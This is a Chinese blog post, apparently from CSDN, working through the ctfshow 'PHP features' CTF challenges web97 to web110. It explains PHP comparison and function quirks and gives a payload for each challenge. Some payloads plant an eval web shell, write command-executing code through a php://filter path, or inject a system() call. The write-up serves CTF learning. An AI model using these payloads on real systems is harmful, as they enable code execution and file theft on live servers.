ctfshow (php特性篇)

最新推荐文章于 2024-08-02 16:22:25 发布
最新推荐文章于 2024-08-02 16:22:25 发布
阅读量932 收藏
点赞数
文章标签: 网络 php5 unctf shell 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45766062/article/details/121566865
版权

web97

<?php
include("flag.php");
highlight_file(__FILE__);
if (isset($_POST['a']) and isset($_POST['b'])) {
	if ($_POST['a'] != $_POST['b'])
		if (md5($_POST['a']) === md5($_POST['b']))
		echo $flag;
	else
		print 'Wrong.';
}
?>

php的MD5()函数不能处理数组,遇到数组时会返回null,绕过强比较。

web98

<?php
include("flag.php");
$_GET?$_GET=&$_POST:'flag';//表示当get传参时,post会覆盖get
$_GET['flag']=='flag'?$_GET=&$_COOKIE:'flag';
$_GET['flag']=='flag'?$_GET=&$_SERVER:'flag';
highlight_file($_GET['HTTP_FLAG']=='flag'?$flag:__FILE__);//当get的HTTP_FLAG为flag时输出flag
?>

payload:get:HTTP_FLAG=flagpost:HTTP_FLAG=flag

web99

了解两个函数的用法:

<?php
$allow=array();
/**
 * rand()函数:随机数生成
 * rand(min,max)
 */
for ($i=36; $i < 0x36d; $i++) {
    array_push($allow, rand(1,$i));
}
//查看生成的数组
print_r($allow);
//测试in_array()函数
if(in_array('1.php',$allow)){
    print '弱比较!';
}
else{
    print '强比较!';
}

payload:

get:?n=1.php  post: content=<?php eval($_POST[1]); ?>

web100

首先了解一下is_numeric()函数,只要v1不为0就为真。

<?php
$v1=0;
$v2=1;
$v3=1;
$v0=$v1 and $v2 and $v3;
if ($v0){
    print "ok!";
}
else{
    print "no!";
}

还有两个函数是var_dump()和print_r()都是打印变量信息。
payload:

payload:?v1=1&v2=var_dump($ctfshow)/*&v3=*/;
payload:?v1=1&v2=print_r($ctfshow)/*&v3=*/;

然后将0x2d替换成“-”:

a='0bca95ec0x2d4f990x2d4e250x2dba1f0x2db7d5a2b01d26'.replace('0x2d','-');
print(a)
#0bca95ec-4f99-4e25-ba1f-b7d5a2b01d26

web 101

与100一样,只不过最后一位需要爆破一下,最后得到是f。

这里说一下啥是php的反射类。反射是指在PHP运行状态中,扩展分析PHP程序,导出或提取出关于类、方法、属性、参数等的详细信息,包括注释。这种动态获取的信息以及动态调用对象的方法的功能称为反射API。反射是操纵面向对象范型中元模型的API,其功能十分强大,可帮助我们构建复杂,可扩展的应用。平常我们用的比较多的是 ReflectionClass类 和 ReflectionMethod类。

<?php
class Kento{
    private $a='aaa';
    const c='ccc';
    protected $b='bbb';
    public function getA(){
        return $this->a;
    }
    public function setB($m){
        $this->b=$m;
    }
}
$class=new  ReflectionClass('Kento');//建立kento这个类的反射类
print_r($class->getConstants());//显示常量
print_r($class->getMethods());//显示类方法
/**
 * 显示常量
 * Array
(
[c] => ccc
)
 * 显示方法
Array
(
[0] => ReflectionMethod Object
(
[name] => getA
[class] => Kento
)

[1] => ReflectionMethod Object
(
[name] => setB
[class] => Kento
)

)

 */

web102

is_numeric()函数,当变量为数字时返回为真。
call_user_func()函数的使用方法,可以参考以下代码:

<?php
class A{
    public function b($c){
        echo $c;
    }
}
call_user_func(array('A','b'),'111');

题目分析:

<?php
highlight_file(__FILE__);
$v1 = $_POST['v1'];
$v2 = $_GET['v2'];
$v3 = $_GET['v3'];
//and的用法前面已经说过了
$v4 = is_numeric($v2) and is_numeric($v3);
if($v4){
$s = substr($v2,2);//这里就是从v2的第二位开始截取
$str = call_user_func($v1,$s);//这里需要将s变量传入一个函数(bin2hex)
echo $str;
file_put_contents($v3,$str);//这里的意图应该是将str写入一个文件
}
else{
die('hacker');
}
?>

直接上payload:

payload:v2=115044383959474e6864434171594473&v3=php://filter/write=convert.base64-decode/resource=1.php post: v1=hex2bin

解释一下payload。因为,要寻找一个纯数字来绕过is_numeric,发现将<?=`cat *经过base64编码以后再进行16进制编码以后能够成功。

web103

与web102一致

web104

sha1和md5传入数组时均返回null:

<?php
$a[]=[1,2,3];
var_dump(sha1($a));//null
var_dump(md5($a));//null

所以,传入两个数组即可绕过。
还可以使用一下字符串绕过弱比较

<?php
print sha1('aaroZmOk').PHP_EOL;
print sha1('aaK1STfY').PHP_EOL;
print sha1('aaO8zKZF').PHP_EOL;
print sha1('aa3OFF9m').PHP_EOL;
//0e66507019969427134894567494305185566735
//0e76658526655756207688271159624026011393
//0e89257456677279068558073954252716165668
//0e36977786278517984959260394024281014729

web105

这是一道变量覆盖问题,通过变量覆盖使得$ error 或$suces为flag都能成功。
(1)利用

die($error);
//payload: get:a=flag  post: error=flag
//此时if(!($_POST['flag']==$flag))执行成功

(2)利用

die($suces);
//利用这个需要让post['flag']==$flag执行成功
//所以post: flag=  get:flag=
//然后get:suces=flag成功
//payload: get:suces=flag&flag= post: flag=

web106

与web104一样

web107

介绍一下parse_str()函数的用法

<?php
parse_str("v1=111&v2=222",$arry);
var_dump($arry);
/**
 * array(2) {
["v1"]=>
string(3) "111"
["v2"]=>
string(3) "222"
}
 */

payload: get:v3[]= post: v1=
因为md5返回数组为空,所以v1也可传入一个空值。

web108

这里主要考察的是ereg()函数的%00绕过,intval和strrev函数的功能可以百度

payload:?c=kento%00778

web109

只要保证new后面的类能够成功,后面就可以执行任何命令了。

payload:v1=Exception();system(‘tac f*’);//&v2=a

web110

了解一下FilesystemIterator

<?php
$a=new FilesystemIterator('.');
while ($a->valid()){
    echo $a->getFilename()."\n";
    $a->next();
}
//.idea
//aa.css
//index.php
//payload.html
//payload.php
//test.html
//test.php

这是一个遍历文件目录的类,但是“.”号被过滤了,可以使用getcwd函数代替,效果也是一样的。

<?php
$a=new FilesystemIterator(getcwd());
while ($a->valid()){
    echo $a->getFilename()."\n";
    $a->next();
}
KKKKKento
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
CTFSHOW PHP特性 111
U_U520的博客
12-05 172
web111 源码 考点是变量覆盖, php超全局变量$GLOBALS的使用(返回所有变量) v1固定为ctfshow,把变量赋值给变量, 然后再用var_dump输出,可以试试=GLOBALS,这样,可以返回全局作用域中可用的全部变量
[基础补漏]CTFshow php特性(待续)
lllffg的博客
03-29 752
web89 考点:数组绕过正则表达式 include("flag.php"); highlight_file(__FILE__); if(isset($_GET['num'])){ $num = $_GET['num']; if(preg_match("/[0-9]/", $num)){ die("no no no!"); } if(intval($num)){ echo $flag; } } 直接数组绕过 <?php $nu
CTFSHOW PHP特性(上 89-110)
羽的博客
10-21 5599
web89 if(isset($_GET['num'])){ $num = $_GET['num']; if(preg_match("/[0-9]/", $num)){ die("no no no!"); } if(intval($num)){ echo $flag; } } 考察点:数组绕过正则表达式 官方文档中如下介绍 返回值 返回完整匹配次数(可能是0),或者如果发生错误返回FALSE。 也就是说如果我们不按规定传一个字符串,
CTFSHOW PHP特性(中 111-131)
羽的博客
10-21 4735
web111 function getFlag(&$v1,&$v2){ eval("$$v1 = &$$v2;"); var_dump($$v1); } if(isset($_GET['v1']) && isset($_GET['v2'])){ $v1 = $_GET['v1']; $v2 = $_GET['v2']; if(preg_match('/\~| |\`|\!|\@|\#|\\$|\%|\^|\&|\*
CTFSHOW PHP特性 (下132-150)
羽的博客
10-21 4733
web132 if(isset($_GET['username']) && isset($_GET['password']) && isset($_GET['code'])){ $username = (String)$_GET['username']; $password = (String)$_GET['password']; $code = (String)$_GET['code']; if($code === mt_rand(1,0x
ctfshow php特性
weixin_63231007的博客
06-13 1353
web113 function filter($file){ if(preg_match('/filter|\.\.\/|http|https|data|data|rot13|base64|string/i',$file)){ die('hacker!'); }else{ return $file; } } $file=$_GET['file']; if(! is_file($file)){ highlight_file(filter($f
CTFSHOW-PHP特性总结
qq_62147945的博客
04-09 189
闲来无事,来水一文章,PHP特性做完也有几天了,但是自己掌握的不怎么样,这一部分的东西有点太零散,感觉很多都复现不出来。但是终究是花费大量时间做完这一部分了,来简单写写总结。说是php特性,其实就是找一下php的bug,怎么利用这些bug来绕过函数,大多数的情况下,可以在本地环境试一下如何绕过那些函数,然后最重要的就是查一下PHP手册。PHP: PHP 手册 - Manual下面就是相关的一些总结,自己掌握的东西不多,感觉会漏掉很多东西。
ctfshow web 入门 php特性
wsitcj的博客
02-22 221
89、用不为空数组绕过 90、 91、第一次匹配php可以换行匹配( ),利用这点可用%0a绕过 92、同90 93、用八进制 94、小数绕过 95、 前面加空格绕过(或者前面加一个‘+’) 96、./表示当前路径 下面是从其他师傅那里拿来的解法 97、 ...
ctfshow php特性(89——150plus)
..
12-14 4743
web89 这题的逻辑是如果存在$_GET['num'],则用正则表达式匹配$num中的值,如果成功匹配则程序终止于"no no no",否则进行下一步,如果intval($num)有正确的返回值,则输出$flag。 解题思路:该题要求传入的值不能有数字,那我们的话可以利用preg_match的一个漏洞,即无法处理数组,从而进行绕过正则匹配,同时intval函数处理一个数组有正确的返回值,可以达到输出flag的目的。 payload : num[]= 或 num[]=任意..
PHP特性(网友根据ctfshow整理)1
08-03
以下是一些重要的PHP特性及其详细解释: 1. **弱类型与`==`比较**: PHP支持弱类型,这意味着在进行比较时,不同类型的数据可以被自动转换成相同类型。例如,字符串"123"与整数123使用`==`比较时,它们被视为相等...
CTFshow-菜狗杯-WEB-变量循环取值-我的眼里只有$
03-04
PHP是一种广泛使用的服务器端脚本语言,常用于构建动态网页,因此,理解PHP语法和特性对于解决这类问题至关重要。 【压缩包子文件的文件名称列表】"CTFshow-变量循环取值-我的眼里只有$" 提供了一个可能包含源代码...
ctfshow web165 JPG二次渲染脚本(生成图片马)脚本
10-21
ctfshow web165 JPG二次渲染脚本(生成图片马)脚本
ctfshow web139命令盲注脚本
10-21
ctfshow靶场 web入门 web139 命令盲注脚本
CTFSHOW web183 正则爆破脚本
10-21
CTFSHOW web183 正则爆破脚本
【Vulnhub系列】Vulnhub Connect-The-Dots 靶场渗透(原创)
最新发布
Lusen的博客
08-02 379
Vulnhub系列Connect-The-Dots靶场做题记录
linux操作系统_TCP
hkhkhkhkh123的博客
07-30 1059
1)三次握手和四次挥手机制 2) 确认应答:TCP将每个字节的数据都进行了编号,即为序列号。每一个ACK都带有对应的确认序列号,保证数据不丢失的按序到达 3)超时重传:当发送端发送的数据在网络中丢失时,在一定时间内没有收到接收端的ACK,则发送端会重新发送丢失数据。2. ACK: 确认应答标志 3. PSH: 表示发送数据,提示接收端从TCP接收缓冲区中读走数据,为接收后续数据腾出空间 4. RST: 重置连接标志 5. SYN: 表示请求建立一个连接 6. FIN: finish标志, 表示释放连接。
网络安全在2024好入行吗?
2401_84466225的博客
07-29 658
024年的今天,慎重进入网安行业吧,目前来说信息安全方向的就业对于学历的容忍度比软件开发要大得多,还有很多高中被挖过来的大佬。
保护国外使用代理IP的安全方法
iphttp的博客
07-30 421
用户在国外使用代理IP时,应该时刻保持警惕,不要随意点击可疑链接,养成良好的网络安全意识。此外,用户还应该避免在代理服务器上输入敏感信息,如银行账号、密码等。使用代理IP时,用户应该尽量使用加密协议(如SSL、TLS)来保护数据传输的安全。这将确保用户的个人信息和访问记录不会被黑客窃取或监控。在选择代理服务器时,用户应该选择那些经过验证和信任的服务器,如知名的VPN服务提供商。用户应该定期更新操作系统和软件,以确保其安全性。这样可以有效地防止黑客通过代理服务器攻击用户的计算机或移动设备。
ctfshow php特性
08-06
引用提到了"ctfshow-php特性-超详解(干货)",它是一关于ctfshow php的博客文章。引用和引用则展示了两段关于ctfshow php特性的代码。其中引用是一段关于RCE(远程代码执行)的代码,而引用是一段关于反射类和命令执行的代码。这些引用都提到了ctfshow php特性,但并没有详细说明这些特性是什么。由于没有更多的上下文信息,我无法提供更详细的答案。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值